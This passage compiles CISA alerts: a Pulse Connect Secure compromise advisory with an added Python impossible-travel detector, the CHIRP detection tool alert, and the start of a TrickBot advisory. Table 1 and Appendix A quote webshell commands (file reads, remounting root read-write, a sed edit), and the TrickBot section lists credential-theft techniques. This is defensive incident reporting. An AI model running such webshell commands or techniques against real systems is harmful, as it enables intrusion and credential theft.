    4/20/21  19:09:14    pulse-loop8  /bin/umount  Content Modification Time
    4/20/21  19:18:49    pulse-loop6  /bin/umount  Metadata Modification Time
    4/23/21  16:14:48    pulse-loop6  /bin/umount  Last Access Time
    5/6/21   14:27:20    pulse-loop8  /bin/umount  Last Access Time
    4/20/21  19:08:01    pulse-loop6  /bin/touch   Last Access Time
    4/20/21  19:09:14    pulse-loop8  /bin/touch   Last Access Time

    Security firm FireEye has posted more information on their blog; see the FireEye blog post, Re-Checking Your Pulse, for more information, including activity related to actor cleanup.

    The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:

    - DSUpgrade.pm (MD5: 4d5b410e1756072a701dfd3722951907): runs arbitrary commands passed to it; copies malicious code into Licenseserverproto.cgi.
    - Licenseserverproto.cgi (MD5: 9b526db005ee8075912ca6572d69a5d6): copies malicious logic to the new files during the patching process, allowing for persistence.
    - Secid_canceltoken.cgi (MD5: f2beca612db26d771fe6ed7a87f48a5a): runs arbitrary commands passed via HTTP requests.
    - compcheckresult.cgi (MD5: ca0175d86049fa7c796ea06b413857a3): publicly-facing page to send arbitrary commands with ID argument.
    - Login.cgi (MD5: 56e2a1566c7989612320f4ef1669e7d5): allows for credential harvesting of authenticated users.
    - Healthcheck.cgi (MD5: 8c291ad2d50f3845788bc11b2f603b4a): runs arbitrary commands passed via HTTP requests.

    Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log in the following format (URIs have been redacted to minimize access to webshells that may still be active):

        Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.

    The threat actor then ran the commands listed in table 1 via the webshell.

    Table 1: Commands run via webshell

    Time                          Command
    2021-01-19T07:46:05.000+0000  pwd
    2021-01-19T07:46:24.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T08:10:13.000+0000  cat%20/home/webserver/htdocs/dana-na/l[redacted]
    2021-01-19T08:14:18.000+0000  See Appendix.
    2021-01-19T08:15:11.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T08:15:49.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T09:03:05.000+0000  cat%20/home/webserver/htdocs/dana-na/[redacted]
    2021-01-19T09:04:47.000+0000  $mount
    2021-01-19T09:05:13.000+0000  /bin/mount%20-o%20remount,rw%20/dev/root%20/
    2021-01-19T09:07:10.000+0000  $mount

    The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on the Pulse Connect Secure appliances. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. Note: these devices are not related to the Pulse vulnerabilities, but rather, where the malicious internet traffic passes through.

    Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

    (Updated April 30, 2021): Detections

    (Updated April 30, 2021): Impossible Travel

    During the course of analysis, it is possible that a network defender may be able to reveal illegitimate connections from users that are masquerading as legitimate users from different geolocations.
    CISA has noted IPs associated with malicious webshell interaction from a threat actor—associated with a single username—in both the authenticated and the unauthenticated logs at the same time. The geolocations of the two IP addresses were sufficiently far apart that impossible travel calculations could detect the threat actor IP address.

    TLS Fingerprinting (Updated April 30, 2021)

    Transport Layer Security (TLS) fingerprinting may also be useful in identifying malicious activity. CISA has noted re-use of various JA3 hashes, including JA3 hashes that align with Chrome, Firefox, and others. Caution should be taken when using TLS fingerprinting because the majority of the JA3 hashes observed in connection with Pulse Connect Secure exploitation were not unique to malicious activity. The same JA3 hashes—and the software they characterize—are often used for benign activity, vulnerability scanning, etc. Overlap in JA3 hashes cannot be considered a high-fidelity indicator of malicious activity, let alone successful exploitation. Connections matched via JA3 must be corroborated with other data points.

    A common observation is that the TLS connections frequently exclude the Server Name Indication (SNI) extension, which is relatively rare in most environments where users connect to Domain Name Server (DNS) host names (but is commonly observed in scanning). It is believed this is an artifact of attackers browsing directly to IP addresses instead of host names.

    The JA3 hashes in table 2 below have been observed in connection with Pulse Secure exploitation. Note: there may be many User-Agents associated with a given JA3 (often due to User-Agent spoofing), and the prevalence of a given JA3 necessarily differs by environment. The prevalence column of table 2 refers to how often the specific JA3 hash was observed in the dataset that was being analyzed. Some hashes are rarely observed in the dataset and the information is provided for context only. Analytical conclusions should not be made solely based on this reporting. The prevalence of a JA3 hash observed in an environment would need to be further evaluated.

    Table 2: JA3 MD5 hashes and associated prevalence/user-agent
    JA3 Hash                          User-Agent                                  Prevalence
    227ab2ae6ed6abcc249e8a873a033144  Firefox (~68-71)                            very rare
    30017f6f809155387cbcf95be6e7225d  (UA header frequently not set)              rare
    3cbc88eabdac9af71445f9040a6cf46c  Chrome (~50-57)                             very rare
    53829d58e2631a372bb4de1be2cbecca  Chrome (~51-81)                             rare
    714cdf6e462870e2b85d251a3b22064b  Firefox (~65-68)                            very rare
    86cb13d6bbb3ac96b78b408bcfc18794  Python-requests, many others                common (but rare when used with Pulse Secure)
    8f6747b71d1003df1b7e3e8232b1a7e3  Chrome (~89)                                rare
    916e458922ae9a1bab6b1154689c7de7  Firefox (~60-86)                            very rare
    a29d0d294a6236b5bf0ec2573dd4f02f  Firefox (~77-87), Chrome (~78-90), others   very rare
    af26ba5e85475b634275141e6ed3dc54  Python-requests, many others                rare
    b592adaa596bb72a5c1ccdbecae52e3f  Chrome (~79-90)                             rare
    c12f54a3f91dc7bafd92cb59fe009a35  Office, many others                         very rare

    Mitigations (Updated May 3, 2021)

    CISA strongly urges organizations using Pulse Secure devices to immediately:

    - Review the Pulse Secure Connect Integrity Tool Quick Start Guide and Customer FAQs.
    - Run the Pulse Secure Connect Integrity Tool. The tool requires a reboot. If virtualized, take a snapshot before running. If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions. (Updated May 3, 2021) Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed. Note: the Pulse Secure team released Security Advisory SA44784 that addresses CVE-2021-22893, CVE-2021-22984, CVE-2021-22899, and CVE-2021-22900 with patches.
    - Implement the mitigations released by the vendor. According to Ivanti Pulse Secure, the interim XML configurations listed in the "Workaround" section of SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893) provide significant protection against threat actor activity.
    - (Updated May 3, 2021) Update to the latest software version, per the process outlined on Ivanti Pulse Secure’s website, which contains security enhancements.

    Using the Pulse Secure Integrity Checker (Updated May 27, 2021)

    The Integrity Checker Tool (ICT) helps system owners understand if their Pulse Secure Connect device has been compromised. While the tool is accurate, there are several nuances to its effective use. The ICT detects evidence of adversary cleanup only on the current, running version of PCS. It may be necessary to roll back the current PCS version to have a valid run of the ICT. During the upgrade process, the active version becomes a rollback partition. Only one rollback partition exists on a device, as the rollback partition is replaced on each update. Therefore, if an entity has updated their PCS device without running the correct version of the ICT (as outlined in Appendix B), anomalous activity will not be detected.

    If the Integrity Checker Tool finds mismatched or unauthorized files, CISA urges organizations to:

    - Contact CISA to report your findings (see Contact Information section below).
    - Contact Ivanti Pulse Secure for assistance in capturing forensic information.
    - Review the “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
    - Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts, and any accounts that could be modified by any account described above; all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
    - Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool.

    (Updated May 27, 2021) Note: adversary activity may not be easily identifiable on your network, as it may appear as normal user traffic. If a device has been compromised, entities should take all precautions as if the adversary has intruded past the device into the network and take steps to ensure there are no further signs of an intrusion, including:

    - Look for unauthorized applications and scheduled tasks in environments.
    - Ensure no new administrators were created.
    - Ensure non-privileged users were not added to privileged groups.
    - Scrutinize and monitor all accounts with domain administrator privileges.
    - Monitor domain administrator accounts to ensure they are only accessing the part of the network they are authorized to access.
    - Check all accounts to ensure they have the proper level of privileges and have not been altered, such as through increased privileges.
    - Remove any remote access programs not approved by the organization.
    - Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.

    In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files should consider the guidance in KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements, which includes: After preservation, you can remediate your Pulse Connect Secure appliance by:

    1. Disabling the external-facing interface.
    2. Saving the system and user config.
    3. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console).
    4. Updating the appliance to the newest version.
    5. Re-importing the saved config.
    6. Re-enabling the external interface.

    CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Pulse Secure Connect Integrity Tool again after remediation has taken place. CISA would like to thank Ivanti for their contributions to this Alert.

    Contact Information

    CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:

    - 1-888-282-0870 (From outside the United States: +1-703-235-8832)
    - central@cisa.dhs.gov (UNCLASS)
    - us-cert@dhs.sgov.gov (SIPRNET)
    - us-cert@dhs.ic.gov (JWICS)

    CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.
    Appendix A: Large sed Command Found In Unauthenticated Logs

    Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20[URL-encoded sed command omitted]%20/home/webserver/htdocs/dana-na/[redacted] came
    from IP XX.XX.XX.XX

    Appendix B: ICT Releases

    Table 3: ICT Releases – releases are cumulative (supported versions: n+1 always supports the nth versions)

    Release package: package-integrity-checker-11951.1.pkg
    Supported versions: 8.3R7.1 (build 65025), 9.1R7 (build 6567), 9.1R8 (build 7453), 9.1R8.1 (build 7851), 9.1R8.2 (build 8511), 9.1R9 (build 9189), 9.1R9.1 (build 9701), 9.1R10 (build 10119), 9.1R11 (build 11161), 9.1R11.1 (build 11915)
    Release date: 3/31/2021 (ICTv1 released to public on 3/31/2021) *Initial build

    Release package: package-integrity-checker-12255.1.pkg
    Supported versions: 9.1R8.4 (build 12177), 9.1R9.2 (build 12181), 9.1R10.2 (build 12179), 9.1R11.3 (build 12173), 9.1R1 (build 1505), 9.1R2 (build 2331), 9.1R3 (build 3535), 9.1R4 (build 4763), 9.1R4.1 (build 4967), 9.1R4.2 (build 5035), 9.1R4.3 (build 5185), 9.1R5 (build 5459), 9.1R6 (build 5801)
    Release date: 4/17/2021 (ICTv2 released to public on 4/18/2021)

    Release package: package-integrity-checker-12363.1.pkg
    Supported versions: 9.1R11.3:HF1 (build 12235), 9.1R9.1HF1 (build 10625.1), 9.1R11.1HF1 (build 12049.1), 9.1R11.4 (build 12319)
    Release date: 5/3/2021 (ICTv3 released to public on 5/3/2021)

    References

    - FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day
    - CERT/CC Vulnerability Note VU#213092: Pulse Connect Secure vulnerable to authentication bypass

    Revisions

    - April 20, 2021: Initial version
    - April 21, 2021: Added CERT/CC Vulnerability Note to References
    - April 26, 2021: Added IOC STIX File
    - April 30, 2021: Replaced IOC STIX File; Added new Detection Section
    - May 3, 2021: Added Ivanti Security Update Information
    - May 27, 2021: Added additional technical details and Appendix B
    - July 21, 2021: Added update note directing reader to review new Malware Analysis Reports

    This product is provided subject to this Notification and this Privacy & Use policy.
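    The impossible-travel check described in the Detections section of the alert above, worked through in code as an added example (not CISA's or Ivanti's code). The log lines, usernames, IP addresses, coordinates, and the 1000 km/h plausibility threshold are all constructed assumptions; a real run would take coordinates from a GeoIP lookup.

```python
"""Impossible-travel check over Pulse Connect Secure style log events.

Added example for the Detections section of AA21-110A; it is not CISA's or
Ivanti's code. The log lines, usernames, IP addresses and coordinates are
constructed; a real run would take coordinates from a GeoIP lookup (assumed).
"""
import math
import re
from collections import defaultdict
from datetime import datetime

# Assumption: nothing legitimate moves faster than a commercial flight.
MAX_PLAUSIBLE_KMH = 1000.0

# Constructed sample events. The timestamp format follows table 1 of the alert;
# the rest of the line is a simplified stand-in for the authenticated and
# unauthenticated request logs (a real parser would use the appliance's format).
SAMPLE_LOG_LINES = [
    "2021-01-19T07:46:05.000+0000 unauthenticated user=jdoe ip=203.0.113.10",
    "2021-01-19T07:50:12.000+0000 authenticated user=jdoe ip=198.51.100.25",
    "2021-01-19T08:00:00.000+0000 authenticated user=asmith ip=192.0.2.44",
    "2021-01-19T16:00:00.000+0000 authenticated user=asmith ip=192.0.2.44",
    "2021-01-19T09:00:00.000+0000 authenticated user=bwong ip=192.0.2.80",
    "2021-01-19T17:00:00.000+0000 authenticated user=bwong ip=192.0.2.81",
]

# Constructed GeoIP table: IP -> (latitude, longitude) in degrees.
GEOIP = {
    "203.0.113.10": (38.90, -77.04),   # Washington, DC
    "198.51.100.25": (55.76, 37.62),   # Moscow
    "192.0.2.44": (41.88, -87.63),     # Chicago
    "192.0.2.80": (40.71, -74.01),     # New York
    "192.0.2.81": (34.05, -118.24),    # Los Angeles
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<source>authenticated|unauthenticated) "
    r"user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)


def parse_events(lines):
    """Turn log lines into (timestamp, source, user, ip) tuples, skipping junk."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")
        events.append((ts, m["source"], m["user"], m["ip"]))
    return events


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on a 6371 km sphere."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def find_impossible_travel(events, geoip=GEOIP, max_kmh=MAX_PLAUSIBLE_KMH):
    """Flag consecutive events per user whose implied speed exceeds max_kmh.

    Returns one finding per flagged pair. 'sources' records which logs the
    pair came from, so a hit seen in both the authenticated and the
    unauthenticated log (the pattern CISA describes) stands out for triage.
    """
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev[2]].append(ev)
    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e[0])
        for (t1, s1, _, ip1), (t2, s2, _, ip2) in zip(evs, evs[1:]):
            if ip1 == ip2 or ip1 not in geoip or ip2 not in geoip:
                continue  # same egress IP, or no location to compare against
            km = haversine_km(*geoip[ip1], *geoip[ip2])
            hours = (t2 - t1).total_seconds() / 3600.0
            # Same-second events from two locations: treat as infinite speed.
            kmh = km / hours if hours > 0 else float("inf")
            if kmh > max_kmh:
                findings.append({
                    "user": user, "from_ip": ip1, "to_ip": ip2,
                    "km": round(km), "hours": round(hours, 2),
                    "kmh": kmh, "sources": {s1, s2},
                })
    return findings


if __name__ == "__main__":
    for finding in find_impossible_travel(parse_events(SAMPLE_LOG_LINES)):
        print(finding)
```

    As the alert stresses, a hit is a lead to corroborate against other data points (session details, JA3, SNI absence), not proof of compromise on its own.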

  • AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool
    by CISA on 18 Marzo 2021 at 6:00 pm

    Original release date: March 18, 2021 | Last revised: April 15, 2021

    Summary

    Updated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise.

    This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts:

    - AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations.
    - AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment.

    Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment. In this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment. CHIRP is freely available on the CISA GitHub Repository. For additional guidance, watch CISA's CHIRP Overview video. Note: CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository.

    CISA advises organizations to use CHIRP to:

    - Examine Windows event logs for artifacts associated with this activity;
    - Examine Windows Registry for evidence of intrusion;
    - Query Windows network artifacts; and
    - Apply YARA rules to detect malware, backdoors, or implants.

    Network defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.

    Technical Details

    How CHIRP Works

    CHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts AA20-352A and AA21-008A. Currently, the tool looks for:

    - The presence of malware identified by security researchers as TEARDROP and RAINDROP;
    - Credential dumping certificate pulls;
    - Certain persistence mechanisms identified as associated with this campaign;
    - System, network, and M365 enumeration; and
    - Known observable indicators of lateral movement.

    Network defenders can follow step-by-step instructions on the CISA CHIRP GitHub repository to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity.

    Compatibility

    CHIRP currently only scans Windows operating systems.

    Instructions

    CHIRP is available on CISA’s GitHub repository in two forms:

    - A compiled executable
    - A Python script

    CISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository. If you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository.

    Mitigations

    Interpreting the Results

    CHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network.

    Frequently Asked Questions

    What systems should CHIRP run on?
    Systems running SolarWinds Orion or believed to be involved in any resulting lateral movement.

    What should I do with results?
    Ingest the JSON results into a SIEM system, web browser, or text editor.

    Are there existing tools that CHIRP complements and/or that provide the same benefit as CHIRP?
    Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning on-premises systems for similar activity.

    How often should I run CHIRP?
    CHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format.

    Do I need to configure the tool before I run it?
    No.

    Will CHIRP change or affect anything on the system(s) it runs on?
    No, CHIRP only scans the system(s) it runs on and makes no active changes.

    How long will it take to run CHIRP?
    CHIRP will complete its scan in approximately 1 to 2 hours. Duration will depend on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs.

    If I have questions, who do I contact?
    For general questions regarding CHIRP, please contact CISA via email at central@cisa.dhs.gov or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at https://us-cert.cisa.gov/report. For all technical issues or support for CHIRP, please submit issues at the CISA CHIRP GitHub Repository.

    Revisions

    - March 18, 2021: Initial Publication
    - April 9, 2021: Fixed PDF (not related to content)
    - April 15, 2021: Updated with Attribution Statement

  • AA21-076A: TrickBot Malware
    by CISA on 17 Marzo 2021 at 3:00 pm

    Original release date: March 17, 2021 | Last revised: May 20, 2021

    Summary

    This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 8. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

    The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.

    TrickBot—first identified in 2016—is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

    To secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.

    Technical Details

    TrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which—if enabled—execute malware (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation (User Execution: Malicious Link [T1204.001], User Execution: Malicious File [T1204.002]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system (Command and Scripting Interpreter: JavaScript [T1059.007]).

    Attackers can use TrickBot to:

    - Drop other malware, such as Ryuk and Conti ransomware, or
    - Serve as an Emotet downloader (Ingress Tool Transfer [T1105]).[1]

    TrickBot uses person-in-the-browser attacks to steal information, such as login credentials (Man in the Browser [T1185]). Additionally, some of TrickBot’s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (Reconnaissance [TA0043]), to trying to manipulate, interrupt, or destroy systems and data (Impact [TA0040]).

    TrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Exfiltration Over C2 Channel [T1041], Resource Hijacking [T1496], System Information Discovery [T1082]).[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.

    Figure 1 lays out TrickBot’s use of enterprise techniques.

    Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot

    MITRE ATT&CK Techniques

    According to MITRE, TrickBot [S0266] uses the ATT&CK techniques listed in table 1.

    Table 1: TrickBot ATT&CK techniques for enterprise (Technique Title, ID, Use)

    Initial Access [TA0001]
    - Phishing: Spearphishing Attachment (T1566.001): TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware.
    - Phishing: Spearphishing Link (T1566.002): TrickBot has been delivered via malicious links in phishing emails.

    Execution [TA0002]
    - Scheduled Task/Job: Scheduled Task (T1053.005): TrickBot creates a scheduled task on the system that provides persistence.
    - Command and Scripting Interpreter: Windows Command Shell (T1059.003): TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.
    - Command and Scripting Interpreter: JavaScript/JScript (T1059.007): TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s C2 server to download TrickBot to the victim’s system.
    - Native API (T1106): TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow.
    - User Execution: Malicious Link (T1204.001): TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link.
    - User Execution: Malicious File (T1204.002): TrickBot has attempted to get users to launch malicious documents to deliver its payload.

    Persistence [TA0003]
    - Scheduled Task/Job: Scheduled Task (T1053.005): TrickBot creates a scheduled task on the system that provides persistence.
    - Create or Modify System Process: Windows Service (T1543.003): TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

    Privilege Escalation [TA0004]
    - Scheduled Task/Job: Scheduled Task (T1053.005): TrickBot creates a scheduled task on the system that provides persistence.
    - Process Injection: Process Hollowing (T1055.012): TrickBot injects into the svchost.exe process.
    - Create or Modify System Process: Windows Service (T1543.003): TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.

    Defense Evasion [TA0005]
    - Obfuscated Files or Information (T1027): TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.
    - Obfuscated Files or Information: Software Packing (T1027.002): TrickBot leverages a custom packer to obfuscate its functionality.
    - Masquerading (T1036): The TrickBot downloader has used an icon to appear as a Microsoft Word document.
    - Process Injection: Process Hollowing (T1055.012): TrickBot injects into the svchost.exe process.
    - Modify Registry (T1112): TrickBot can modify registry entries.
    - Deobfuscate/Decode Files or Information (T1140): TrickBot decodes the configuration data and modules.
    - Subvert Trust Controls: Code Signing (T1553.002): TrickBot has come with a signed downloader component.
    - Impair Defenses: Disable or Modify Tools (T1562.001): TrickBot can disable Windows Defender.

    Credential Access [TA0006]
    - Input Capture: Credential API Hooking (T1056.004): TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
    - Unsecured Credentials: Credentials in Files (T1552.001): TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials.
    - Unsecured Credentials: Credentials in Registry (T1552.002): TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key.
    - Credentials from Password Stores (T1555): TrickBot can steal passwords from the KeePass open-source password manager.
    - Credentials from Password Stores: Credentials from Web Browsers (T1555.003): TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.

    Discovery [TA0007]
    - System Service Discovery (T1007): TrickBot collects a list of installed programs and services on the victim’s machine.
    - System Network Configuration Discovery (T1016): TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.
    - Remote System Discovery (T1018): TrickBot can enumerate computers and network devices.
    - System Owner/User Discovery (T1033): TrickBot can identify the user and groups the user belongs to on a compromised host.
    - Permission Groups Discovery (T1069): TrickBot can identify the groups the user on a compromised host belongs to.
    - System Information Discovery (T1082): TrickBot gathers the OS version, machine name, CPU type, and amount of RAM available from the victim’s machine.
    - File and Directory Discovery (T1083): TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.
    - Account Discovery: Local Account (T1087.001): TrickBot collects the users of the system.
    - Account Discovery: Email Account (T1087.003): TrickBot collects email addresses from Outlook.
    - Domain Trust Discovery (T1482): TrickBot can gather information about domain trusts by utilizing Nltest.

    Lateral Movement [TA0008]
    - Lateral Tool Transfer (T1570): Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol.

    Collection [TA0009]
    - Data from Local System (T1005): TrickBot collects local files and information from the victim’s local machine.
    - Input Capture: Credential API Hooking (T1056.004): TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API.
    - Person in the Browser (T1185): TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage.

    Command and Control [TA0011]
    - Fallback Channels (T1008): TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers.
    - Application Layer Protocol: Web Protocols (T1071.001): TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic, and various configuration files.
    - Ingress Tool Transfer (T1105): TrickBot downloads several additional files and saves them to the victim's machine.
    - Data Encoding: Standard Encoding (T1132.001): TrickBot can Base64-encode C2 commands.
    - Non-Standard Port (T1571): Some TrickBot samples have used HTTP over ports 447 and 8082 for C2.
    - Encrypted Channel: Symmetric Cryptography (T1573.001): TrickBot uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.

    Exfiltration [TA0010]
    - Exfiltration Over C2 Channel (T1041): TrickBot can send information about the compromised host to a hardcoded C2 server.

    Impact [TA0040]
    - Resource Hijacking (T1496): TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency.

    Detection Signatures

    CISA developed the following Snort signatures for use in detecting network activity associated with TrickBot activity.
